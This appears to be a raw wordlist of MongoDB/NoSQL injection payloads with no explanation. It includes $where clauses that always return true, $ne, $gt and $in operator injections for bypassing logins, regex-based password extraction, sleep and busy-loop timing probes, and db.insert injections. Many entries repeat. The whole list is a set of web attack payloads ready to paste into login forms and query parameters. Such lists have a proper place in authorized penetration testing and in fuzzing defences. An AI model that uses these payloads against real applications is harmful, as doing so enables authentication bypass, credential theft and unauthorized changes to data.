true, $where: '1 == 1'
', $where: '1 == 1'
$where: '1 == 1'
' && 1==1
1, $where: '1 == 1'
{ $ne: 1 }
'$where': '1 == 1'
' && this.username.match(/.*/)//+%00
db.injection.insert({success:1});
true, $where: '1 == 1'
', $where: '1 == 1'
{ '$gt': '' }
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
' || 1==1
'|| '1' == '1'
' && this.password.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
$gt 
$ne
$nin
$where: '1 == 1'
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
' || 'a'=='a'
' } ], $comment:'successful MongoDB injection'
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
', $or: [ {}, { 'a':'a' }
', $where: '1 == 1'
', $where: '1 == 1'
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
';sleep(5000);
';sleep(5000);'
';sleep(5000);+'
, $where: '1 == 1'
1, $where: '1 == 1'
[$ne]=1
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
true, $where: '1 == 1'
{ $ne: 1 }
{"$gt": ""}
{"$gt":""}
{"$gt":-1}
{"$ne":""}
{"$ne":-1}
{"$nin":1}
{"$nin":[1]}
{"$where":  "sleep(1000)"}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
{$gt: ''}
{$nin: [""]}
|| 1==1
|| 1==1%00
|| 1==1//
}, { password : /.*/ }

true, $where: '1 == 1' + ' OR ' + '1 == 1'
' || 1==1 || ''
'$where': 'function() { return true; }'
'$where': 'function() { return 1 == 1; }'
'$where': 'this.username == "admin"'
' && this.username == "admin" //'
{ $where: '1 == 1' }
{ '$where': 'function() { return true; }' }
{"$where": "function() { return 1; }"}
' && 1==1 #
'$where': '1 == 1' && '1 == 1' // comment
1, $where: 'this.username.length > 0'
' && this.username.length > 0
1, $where: 'this.username == "admin"'
{ $or: [{ 'username': 'admin' }, { 'username': 'root' }] }
'$where': 'function() { return artist == "Weezer"; }'
{ $where: 'function() { return this.password == "1234"; }' }
$or: [ { 'a': 'a' }, { 'b': 'b' } ]
' && this.password == 'password'
$in: ['foo', 'bar']
$or: [{ 'username': { '$ne': 'admin' } }]
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
|| 1==1 #
' || 'a' == 'a'
{ '$where': '1 == 1 || false' }
'$where': '1 == 1 && false'
' || this.username.match(/.*/)//+%00
; this.username = 'admin' //
' || true //
{ $or: [ { 'a': 'a' }, { 'b': 'b' }, { 'c': 'c' } ] }
{ '$where': 'return true' }
' && 1==1; -- 
' || 1==1 -- 
1, $where: { '$eq': 1 }
1, $where: 'this.password.length > 0'
; this.username = 'admin' // 
{ '$where': 'this.username == "admin"' }
$ne: [null]
{ '$where': 'this.username == "admin" || false' }
' || this.username == "admin" #
'$where': 'this.username.length > 0'
' || this.username.length > 0
{ 'username': { '$exists': true } }
{ '$where': 'this.username.length > 0' }
$and: [{ 'username': { '$ne': null } }]
'$where': 'function() { return true; }' + ' && ' + '1 == 1'
$where: '1 == 1 || '''
'$where': 'function() { return false; }'
' || this.username == "admin" #
$or: [ { 'username': { '$ne': null } }]
{ '$where': 'this.password.length > 0' }
{ '$where': 'function() { return false; }' }
'$where': 'this.username.length > 0' + ' && ' + '1 == 1'
{ $where: 'return this.username.length > 0' }
' || '1' == '1' //
$where: '1 == 1 || 1 == 1'
{ $where: '1 == 1 && 1 == 1' }
{ $where: '1 == 1 && true' }
'$where': 'function() { return 1; }'
' || this.password == "admin" //
' || this.password == "1234" //
{ $where: 'this.username != ""' }
' && this.username != "" //
'$where': 'this.username == "user"'
$or: [{ 'username': { '$ne': 'admin' } }, { 'password': { '$ne': 'pass' } }]
{ '$where': 'this.password.length > 0' }
' && this.password == "admin" #
' || this.username == "admin" //
' || this.password == "admin" //
{ $or: [{ 'username': 'admin' }, { 'password': 'admin' }] }
{ $where: 'this.username == "root"' }
' || '1' == '1' #
'$where': '1 == 1 || this.username == "admin"'
{ $where: 'return this.password == "secret";' }
' && this.username.match(/admin/) //
' || true // 
' && this.username.match(/root/) //
' && this.password.match(/root/) //
{ $where: 'this.username == "admin" && true;' }
' || this.password == "password" //
' || this.username == "user" //
{ $where: 'return this.password.length > 0;' }
{ $where: 'this.username == "admin" || false' }
{ $where: '1 == 1 && this.password == "1234"' }
$or: [{ 'username': { '$ne': 'guest' } }, { 'password': { '$ne': 'guest' } }]
' || this.password.length > 0 // 
{ $where: 'this.username.length > 0' }
' && this.password.match(/.*/)//
{ $where: 'this.username.length > 0 || false;' }
